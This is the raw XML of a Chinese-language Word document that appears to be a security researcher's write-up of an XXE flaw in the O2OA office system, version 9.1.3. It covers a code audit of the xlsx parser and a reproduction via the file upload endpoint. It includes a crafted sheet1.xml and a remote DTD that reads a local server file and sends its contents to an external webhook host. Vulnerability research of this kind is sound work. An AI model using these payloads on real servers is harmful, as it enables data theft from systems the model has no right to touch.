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219" w:rsidRDefault="00B44FDD" w:rsidP="00B44FDD">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资产情况</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B44FDD" w:rsidRPr="00B44FDD" w:rsidRDefault="00B44FDD" w:rsidP="00B44FDD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DFBDCD1" wp14:editId="08C5502D">
            <wp:extent cx="5274310" cy="2523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>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="325573C5" wp14:editId="72C47E06">
            <wp:extent cx="5274310" cy="1664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>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EF916EC" wp14:editId="0FA4BB20">
            <wp:extent cx="5274310" cy="2523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>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用下载</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B44FDD" w:rsidRDefault="00B44FDD" w:rsidP="00B44FDD">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官网下载</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.o2oa.net/download.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>「</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>O2OA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>翱</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>途」下载中心</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>移动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>OA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>办公系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>电子政务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>OA_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>信创国产化</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>OA</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>该应用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>集成环境，包含源码和运行环境</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B44FDD" w:rsidRDefault="00B44FDD" w:rsidP="00B44FDD">
      <w:r w:rsidRPr="00B44FDD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B9B6DB7" wp14:editId="6437F47A">
            <wp:extent cx="5274310" cy="2053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>
      <w:r>
        <w:t>解压后，脚本一键运行，</w:t>
      </w:r>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t>环境就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>tart_windows.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>bat</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00B44FDD" w:rsidRDefault="00B44FDD" w:rsidP="00B44FDD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67EF35F0" wp14:editId="32D3622A">
            <wp:extent cx="5274310" cy="33096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>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码审计</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B44FDD" w:rsidRDefault="00B44FDD" w:rsidP="00B44FDD">
      <w:r>
        <w:t>编辑器打开解压后项目，搜索</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44FDD">
        <w:t>Excel2007Reader</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:t>类的方法</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="00B44FDD">
        <w:t xml:space="preserve">public </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B44FDD">
        <w:t>XMLReader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B44FDD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B44FDD">
        <w:t>fetchSheetParser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B44FDD">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B44FDD">
        <w:t>SharedStringsTable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B44FDD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B44FDD">
        <w:t>sst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B44FDD">
        <w:t xml:space="preserve">) throws </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B44FDD">
        <w:t>SAXException</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">` </w:t>
      </w:r>
      <w:r>
        <w:t>定位</w:t>
      </w:r>
      <w:r>
        <w:t>sink</w:t>
      </w:r>
      <w:r>
        <w:t>点，这里</w:t>
      </w:r>
      <w:r w:rsidR="00534587">
        <w:t>解析了构成</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00534587">
        <w:t>xlsx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00534587">
        <w:t>文档的</w:t>
      </w:r>
      <w:r w:rsidR="00534587">
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>，且没有发现</w:t>
      </w:r>
      <w:r w:rsidR="00534587">
        <w:t>防御</w:t>
      </w:r>
      <w:r w:rsidR="00534587">
        <w:t>XXE</w:t>
      </w:r>
      <w:r w:rsidR="00534587">
        <w:t>注入的设置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00534587" w:rsidRDefault="00534587" w:rsidP="00B44FDD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0884C5C7" wp14:editId="3F3618BB">
            <wp:extent cx="4151394" cy="166685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578" cy="16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87" w:rsidRDefault="00534587" w:rsidP="00B44FDD">
      <w:r w:rsidRPr="00534587">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65DBC2DB" wp14:editId="686AE5D1">
            <wp:extent cx="5274310" cy="873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87" w:rsidRDefault="00534587" w:rsidP="00B44FDD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>追踪调用情况，定位接口，该接口虽然废弃，仍可以进行调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00534587" w:rsidRDefault="00534587" w:rsidP="00B44FDD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49E6BEEE" wp14:editId="75A9785B">
            <wp:extent cx="5274310" cy="146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87" w:rsidRDefault="00534587" w:rsidP="00B44FDD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45FD858A" wp14:editId="02BE6EB3">
            <wp:extent cx="5274310" cy="2731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DD" w:rsidRDefault="00B44FDD" w:rsidP="00B44FDD"/>
    <w:p w:rsidR="00534587" w:rsidRDefault="00534587" w:rsidP="00534587">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00534587" w:rsidRDefault="00534587" w:rsidP="00534587">
      <w:r>
        <w:t>由于该漏洞需要上传</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xlsx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>触发，且前端没有相应功能，我们需要借用其他功能构造报文。脚本启动</w:t>
      </w:r>
      <w:r>
        <w:t>OA</w:t>
      </w:r>
      <w:r>
        <w:t>，进入后台如下位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00534587" w:rsidRDefault="00534587" w:rsidP="00534587">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="502D68E6" wp14:editId="35658EAB">
            <wp:extent cx="5274310" cy="24149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87" w:rsidRDefault="00534587" w:rsidP="00534587">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="496B8E55" wp14:editId="092A1172">
            <wp:extent cx="5274310" cy="2414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87" w:rsidRDefault="00534587" w:rsidP="00534587">
      <w:r>
        <w:t>这里导出一个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xlsx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>文档，解压后进入</w:t>
      </w:r>
      <w:r w:rsidR="00EB51F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00EB51F0">
        <w:t>orksheets</w:t>
      </w:r>
      <w:r w:rsidR="00EB51F0">
        <w:t>目录，再</w:t>
      </w:r>
      <w:r w:rsidR="00EB51F0">
        <w:t>sheet1.xml</w:t>
      </w:r>
      <w:r w:rsidR="00EB51F0">
        <w:t>中加上我们的</w:t>
      </w:r>
      <w:r w:rsidR="00EB51F0">
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidR="00EB51F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00EB51F0">
        <w:t>链接是我们远程</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CC719C">
        <w:t>dtd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00EB51F0" w:rsidRPr="00EB51F0" w:rsidRDefault="00EB51F0" w:rsidP="00EB51F0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EB51F0">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&lt;!DOCTYPE</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EB51F0">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> root SYSTEM "https://webhook.uutool.cn/4psst213pbr0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB51F0" w:rsidRPr="00EB51F0" w:rsidRDefault="00EB51F0" w:rsidP="00EB51F0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB51F0">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EB51F0">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EB51F0">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&gt;&amp;send;&lt;/root&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB51F0" w:rsidRDefault="00EB51F0" w:rsidP="00534587">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51DEFA24" wp14:editId="5660D7C8">
            <wp:extent cx="5274310" cy="1208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9C" w:rsidRDefault="00CC719C" w:rsidP="00534587">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB51F0" w:rsidRDefault="00EB51F0" w:rsidP="00534587">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B982545" wp14:editId="235A754D">
            <wp:extent cx="5274310" cy="2797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9C" w:rsidRDefault="00CC719C" w:rsidP="00CC719C">
      <w:r>
        <w:t>将刚刚解压的文件再压缩为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xlsx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00CC719C" w:rsidRPr="00CC719C" w:rsidRDefault="00CC719C" w:rsidP="00534587">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7374B766" wp14:editId="25F572B8">
            <wp:extent cx="5274310" cy="2087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9C" w:rsidRDefault="00CC719C" w:rsidP="00534587">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC719C" w:rsidRDefault="00CC719C" w:rsidP="00534587">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>在反连平台</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>上配置（</w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>在线</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>Webhook</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>请求接收工具</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t xml:space="preserve"> - UU</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>在线工具</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>file:///</w:t>
      </w:r>
      <w:r>
        <w:t>后的路径为要读取的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地文件（高版本的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只能读取一行），这里用服务器下的</w:t>
      </w:r>
      <w:r>
        <w:t>pid.log</w:t>
      </w:r>
      <w:r>
        <w:t>做演示，后面的</w:t>
      </w:r>
      <w:r>
        <w:t>https</w:t>
      </w:r>
      <w:r>
        <w:t>链接</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>为反连平台</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>，接受我们读取的文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC719C" w:rsidRPr="00CC719C" w:rsidRDefault="00CC719C" w:rsidP="00CC719C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC719C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&lt;!ENTITY</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC719C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> % start "&lt;![CDATA["&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC719C" w:rsidRPr="00CC719C" w:rsidRDefault="00CC719C" w:rsidP="00CC719C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC719C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&lt;!E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>NTITY</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> % </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "file:///D:/your/path</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC719C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>/O2OA/server/o2server-9.1.3-windows-x64/o2server/pid.log"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC719C" w:rsidRPr="00CC719C" w:rsidRDefault="00CC719C" w:rsidP="00CC719C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC719C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&lt;!ENTITY</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC719C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> % end "]]&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC719C" w:rsidRPr="00CC719C" w:rsidRDefault="00CC719C" w:rsidP="00CC719C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC719C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&lt;!ENTITY</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC719C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> % evil "%start;%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC719C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC719C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>;%end;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC719C" w:rsidRPr="00CC719C" w:rsidRDefault="00CC719C" w:rsidP="00CC719C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC719C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&lt;!ENTITY</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC719C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> % </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC719C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>dtd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC719C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> "&lt;!ENTITY send SYSTEM 'https://webhook.uutool.cn/4psst213pbr0?%evil;'&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC719C" w:rsidRDefault="00CC719C" w:rsidP="00CC719C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC719C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC719C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>dtd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC719C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC719C" w:rsidRDefault="00CC719C" w:rsidP="00CC719C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC719C" w:rsidRDefault="00CC719C" w:rsidP="00CC719C">
      <w:r>
        <w:t>在刚刚的功能点上传</w:t>
      </w:r>
      <w:r>
        <w:t>excel</w:t>
      </w:r>
      <w:r>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC719C" w:rsidRDefault="00CC719C" w:rsidP="00CC719C">
      <w:r w:rsidRPr="00CC719C">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61B3C575" wp14:editId="3F073F9A">
            <wp:extent cx="5274310" cy="1694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9C" w:rsidRPr="00CC719C" w:rsidRDefault="00CC719C" w:rsidP="00CC719C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yakit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>（我使用</w:t>
      </w:r>
      <w:r>
        <w:t>burp</w:t>
      </w:r>
      <w:r>
        <w:t>时貌似存在</w:t>
      </w:r>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
      <w:r w:rsidR="00C62AA0">
        <w:t>，会改变文件结构而导致</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C62AA0">
        <w:t>xlsx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C62AA0">
        <w:t>解析不成功</w:t>
      </w:r>
      <w:r>
        <w:t>）中抓到该报文，修改接口为刚刚审计的接口</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC719C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC719C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>x_attendance_assemble_control</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC719C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC719C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>jaxrs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC719C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>/file/upload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC719C" w:rsidRDefault="00CC719C" w:rsidP="00CC719C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59B5D43E" wp14:editId="62D2CC46">
            <wp:extent cx="5274310" cy="21012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9C" w:rsidRDefault="00CC719C" w:rsidP="00CC719C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D24CE41" wp14:editId="7AF8B1B6">
            <wp:extent cx="5274310" cy="2505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A0" w:rsidRDefault="00C62AA0" w:rsidP="00CC719C">
      <w:r>
        <w:t>查看反连服务器，收到文件内容</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00C62AA0" w:rsidRPr="00CC719C" w:rsidRDefault="00C62AA0" w:rsidP="00CC71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FA9E4" wp14:editId="3FF8C1D7">
            <wp:extent cx="5274310" cy="3221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AA0" w:rsidRPr="00CC7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FC37E5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A10EFE62"/>
    <w:lvl w:ilvl="0" w:tplc="8D9E761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052"/>
    <w:rsid w:val="005161A2"/>
    <w:rsid w:val="00534587"/>
    <w:rsid w:val="007D7219"/>
    <w:rsid w:val="008B2052"/>
    <w:rsid w:val="00B44FDD"/>
    <w:rsid w:val="00C62AA0"/>
    <w:rsid w:val="00CC719C"/>
    <w:rsid w:val="00EB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699E94-C0FB-4785-8AC2-9B576EAA9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44F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FD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44F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B44F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uutool.cn/webhoo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2024-11-28T11:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-28T12:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>